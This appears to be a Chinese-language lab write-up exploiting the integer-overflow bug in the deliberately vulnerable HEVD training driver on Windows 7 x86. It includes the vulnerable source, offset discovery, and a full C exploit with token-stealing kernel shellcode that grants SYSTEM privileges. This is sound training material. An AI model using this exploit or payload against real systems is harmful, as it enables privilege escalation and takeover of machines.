作者：selph

前言

窺探Ring0漏洞世界：整型溢出漏洞

本例中，整型溢出的問題出現(xiàn)在安全檢驗(yàn)的地方，由于整型溢出導(dǎo)致錯誤的輸入通過了安全檢驗(yàn)，從而造成了棧溢出漏洞

所謂整型溢出，有兩種，上溢出和下溢出，一個整型能表示的范圍是有限的，當(dāng)超出范圍，就會發(fā)生溢出，例如0xffffffff+4 = 3，0-4=0xfffffffc

整型溢出漏洞是由于對用戶輸入的不安全處理而導(dǎo)致不安全的數(shù)據(jù)通過安全檢驗(yàn)從而導(dǎo)致其他漏洞。

實(shí)驗(yàn)環(huán)境：

?虛擬機(jī)：Windows 7 x86

?物理機(jī)：Windows 10 x64

?軟件：IDA，Windbg，VS2022

漏洞分析

該漏洞的觸發(fā)函數(shù)TriggerIntegerOverflow，操作碼是：0x222027：

首先一開始就是一個初始化局部緩沖區(qū)的操作：

然后緊接著對用戶輸入的緩沖區(qū)進(jìn)行了大小檢測，如果大于緩沖區(qū)大小則打印信息退出函數(shù)，如果小于等于則進(jìn)入下面的whlie循環(huán)：不斷復(fù)制用戶緩沖區(qū)到內(nèi)核緩沖區(qū)，每次復(fù)制4字節(jié)，直到復(fù)制的內(nèi)容出現(xiàn)魔數(shù)或者用戶緩沖區(qū)長度復(fù)制完成為止

乍一看好像沒啥問題，但仔細(xì)觀察上面判斷用戶輸入Size那一塊代碼：if(Size + 4 > 0x800)

對于4字節(jié)整數(shù)，當(dāng)出現(xiàn)溢出的時候：

0xfffffffc + 4 = 0
0xffffffff + 4 = 3

所以該處存在漏洞，有以下利用思路：通過給定Size參數(shù)一個超大的值，使得導(dǎo)致溢出，從而在后面while代碼塊進(jìn)行復(fù)制的時候?qū)е聴Ｒ绯?，從而進(jìn)行利用

接下來看看源碼：

///

/// Trigger the Integer Overflow Vulnerability
///

///The pointer to user mode buffer
///Size of the user mode buffer
///?NTSTATUS
__declspec(safebuffers)
NTSTATUS
TriggerIntegerOverflow(
_In_ PVOID UserBuffer,
??? _In_ ULONG Size
)
{
??? ULONG Count = 0;
???NTSTATUS Status = STATUS_SUCCESS;
??? ULONG BufferTerminator = 0xBAD0B0B0;
??? ULONG KernelBuffer[BUFFER_SIZE] = { 0 };
??? ULONG TerminatorSize = sizeof(BufferTerminator);

???PAGED_CODE();

??? __try
??? {
???????//
???????// Verify if the buffer resides in user mode
???????//

???????ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(UCHAR));

???????DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
???????DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
???????DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
? ??????DbgPrint("[+] KernelBuffer Size: 0x%zX\n", sizeof(KernelBuffer));

#ifdef SECURE
???????//
???????// Secure Note: This is secure because the developer is not doing any arithmetic
???????// on the user supplied value. Instead, the developer is subtracting the size of
???????// ULONG i.e. 4 on x86 from the size of KernelBuffer. Hence, integer overflow will
???????// not occur and this check will not fail
???????//

???????if (Size > (sizeof(KernelBuffer) - TerminatorSize))
??????? {
???????????DbgPrint("[-] Invalid UserBuffer Size: 0x%X\n", Size);

???????????Status = STATUS_INVALID_BUFFER_SIZE;
???????????return Status;
??????? }
#else
???????DbgPrint("[+] Triggering Integer Overflow (Arithmetic Overflow)\n");

???????//
???????// Vulnerability Note: This is a vanilla Integer Overflow vulnerability because if
???????// 'Size' is 0xFFFFFFFF and we do an addition with size of ULONG i.e. 4 on x86, the
???????// integer will wrap down and will finally cause this check to fail
???????//

???? ???if ((Size + TerminatorSize) > sizeof(KernelBuffer))
??????? {
???????????DbgPrint("[-] Invalid UserBuffer Size: 0x%X\n", Size);

???????????Status = STATUS_INVALID_BUFFER_SIZE;
???????????return Status;
??????? }
#endif

???????//
???????// Perform the copy operation
???????//

???????while (Count < (Size / sizeof(ULONG)))
??????? {
???????????if (*(PULONG)UserBuffer != BufferTerminator)
???????????{
???????????????KernelBuffer[Count] = *(PULONG)UserBuffer;
???????????????UserBuffer = (PULONG)UserBuffer + 1;
???????????????Count++;
???????????}
???????????else
???????????{
???????????????break;
???????????}
??????? }
??? }
???__except (EXCEPTION_EXECUTE_HANDLER)
??? {
???????Status = GetExceptionCode();
???????DbgPrint("[-] Exception Code: 0x%X\n", Status);
??? }

???return Status;
}

該漏洞的修復(fù)很簡單，把判定條件從左邊變到右邊：if(Size > 0x800 - 4)，這樣用戶輸入也就不會發(fā)生變化了

漏洞利用

利用思路：利用kali生成一個超長隨機(jī)數(shù)組作為用戶緩沖區(qū)輸入，傳入的Size給出一個會導(dǎo)致溢出的值，然后觸發(fā)棧溢出，確定溢出點(diǎn)，填入跳轉(zhuǎn)地址執(zhí)行shellcode

首先第一步：生成超長字符串：

┌──(selph?kali)-[~/桌面]
└─$ ./pattern_create.rb -l 0x900????????????
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9AV0AV1AV2AV3AV4AV5AV6AV7AV8AV9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9CV0CV1CV2CV3CV4CV5CV6CV7CV8CV9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7

測試代碼：

#include
#include

const char* randomStr = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9AV0AV1AV2AV3AV4AV5AV6AV7AV8AV9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9CV0CV1CV2CV3CV4CV5CV6CV7CV8CV9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7";

int main()
{

ULONG UserBufferSize = 0xffffffff;

???HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);
??? if (hDevice == INVALID_HANDLE_VALUE) {
??????? printf("[ERROR]Open Device Error\r\n");
???????system("pause");
???????exit(1);
??? }
??? else {
???????printf("[INFO]Device Handle: 0x%X\n", hDevice);
??? }

??? ULONG WriteRet = 0;
???DeviceIoControl(hDevice, 0x222027, (LPVOID)randomStr, UserBufferSize, NULL, 0, &WriteRet, NULL);

???system("pause");
???system("cmd.exe");

???return 0;
}

預(yù)料之內(nèi)的崩潰了，查看棧回溯：

kd> k
# ChildEBP RetAddr???
00 9bcd2d74 83ef4083???? nt!RtlpBreakWithStatusInstruction
01 9bcd2dc4 83ef4b81???? nt!KiBugCheckDebugBreak+0x1c
02 9bcd3188 83ea341b???? nt!KeBugCheck2+0x68b
03 9bcd3210 83e563d8???? nt!MmAccessFault+0x106
???
04 9bcd3210 8d9f5733 (T) nt!KiTrap0E+0xdc
???
05 9bcd3ad0 43367243 (T) HEVD!TriggerIntegerOverflow+0xd5 [C:\Users\selph\Desktop\HackSysExtremeVulnerableDriver-master\Driver\HEVD\Windows\IntegerOverflow.c @ 133]
WARNING: Frame IP not in any known module. Following frames may be wrong.
06 9bcd3adc 43307343???? 0x43367243

可以看到05號函數(shù)調(diào)用那里出現(xiàn)了WARNING，說是這個IP不是任何已知模塊，實(shí)際上這就是咱們剛剛溢出覆蓋返回地址的地方

拿出kali查看一下這個值43367243的位置：

┌──(selph?kali)-[~/桌面]
└─$ ./pattern_offset.rb -q 43367243 -l 0x9000
[*] Exact match at offset 2088

位于2088字節(jié)處，通過溢出這么多字節(jié)，可控返回地址，接下來可以編寫exp了

編寫exp：

注意：在覆蓋完返回地址之后，把那個魔數(shù)跟在后面用來結(jié)束復(fù)制，不然大量像后面復(fù)制會導(dǎo)致進(jìn)入某個異常處理函數(shù)而不是走返回地址返回（藍(lán)屏了三次才發(fā)現(xiàn)問題所在....）

#include
#include

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET0x124?// nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET??? 0x050?// nt!_KTHREAD.ApcState.Process
#define PID_OFFSET???????? 0x0B4?// nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET?????? 0x0B8?// nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET?????? 0x0F8?// nt!_EPROCESS.Token
#define SYSTEM_PID???????? 0x004?// SYSTEM Process PID

VOID TokenStealingPayloadWin7() {
??? // Importance of Kernel Recovery
??? __asm {
???????pushad

??? ;獲取當(dāng)前進(jìn)程EPROCESS
???????xor eax, eax
???????mov eax, fs: [eax + KTHREAD_OFFSET]
???????mov eax, [eax + EPROCESS_OFFSET]
???????mov ecx, eax

??? ;搜索system進(jìn)程EPROCESS
???????mov edx, SYSTEM_PID
???????SearchSystemPID:
???????mov eax, [eax + FLINK_OFFSET]
???????sub eax, FLINK_OFFSET
???????cmp[eax + PID_OFFSET], edx
???????jne SearchSystemPID

???;token竊取
???????mov edx, [eax + TOKEN_OFFSET]
???????mov[ecx + TOKEN_OFFSET], edx

??? ;環(huán)境還原+返回
???????popad
???????xor eax, eax
???????add esp, 12
???????pop ebp
???????ret 8
??? }
}

int main()
{
??? ULONG UserBufferSize = 2088+4+4;
??? PVOID EopPayload = &TokenStealingPayloadWin7;

???HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);
??? if (hDevice == INVALID_HANDLE_VALUE) {
???????printf("[ERROR]Open Device Error\r\n");
???????system("pause");
???????exit(1);
??? }
??? else {
???????printf("[INFO]Device Handle: 0x%X\n", hDevice);
??? }

???PULONG UserBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);
??? if (!UserBuffer) {
???????printf("[ERROR]Allocate ERROR");
???????system("pause");

???????exit(1);
??? }
??? else {
???????printf("[INFO]Allocated Memory: 0x%p\n", UserBuffer);
???????printf("[INFO]Allocation Size: 0x%X\n", UserBufferSize);
??? }

???RtlFillMemory(UserBuffer, UserBufferSize, 0x41);

??? PVOID MemoryAddress = (PVOID)(((ULONG)UserBuffer + UserBufferSize) - sizeof(ULONG)*2);
???*(PULONG)MemoryAddress = (ULONG)EopPayload;
???//0x0BAD0B0B0
???MemoryAddress = (PVOID)(((ULONG)UserBuffer + UserBufferSize) - sizeof(ULONG));
???*(PULONG)MemoryAddress = (ULONG)0x0BAD0B0B0;

??? ULONG WriteRet = 0;
???DeviceIoControl(hDevice, 0x222027, (LPVOID)UserBuffer, 0xffffffff, NULL, 0, &WriteRet, NULL);

???HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);
???UserBuffer = NULL;

???system("pause");
???system("cmd.exe");

???return 0;
}

截圖演示

參考資料

?[1] FuzzySecurity | Windows ExploitDev: Part 14 https://www.fuzzysecurity.com/tutorials/expDev/18.html

?[2] [原創(chuàng)]HEVD學(xué)習(xí)筆記之整數(shù)溢出漏洞-二進(jìn)制漏洞-看雪論壇-安全社區(qū)|安全招聘|bbs.pediy.com https://bbs.pediy.com/thread-270192.htm

?[3] Jcc — Jump if Condition Is Met (felixcloutier.com) https://www.felixcloutier.com/x86/jcc

?[4]?整型溢出漏洞_ATFWUS的博客-CSDN博客_整形溢出漏洞https://blog.csdn.net/ATFWUS/article/details/104605336